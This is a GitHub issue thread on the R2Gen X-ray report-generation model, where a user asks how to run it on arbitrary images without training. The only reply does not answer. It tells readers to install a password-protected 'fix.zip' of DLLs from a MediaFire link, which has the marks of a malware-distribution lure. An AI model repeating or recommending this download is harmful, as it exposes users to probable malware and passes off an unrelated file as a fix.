### ISSUE TITLE
How can I use the model to generate a report on any X-ray?

### ISSUE THREAD

**Issue by Labqw** [zhjohnchan/R2Gen#11]
Hello, if I want to take any image as input and output the corresponding report through R2Gen, how can I achieve it? How can I avoid training and directly use ready-made image testing?
你好，如果我想把任意一张图片作为输入，通过R2Gen输出相应的报告，我该如何实现?如何避免培训，直接使用现成的形象测试?

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
I put the necessary dlls in the archive
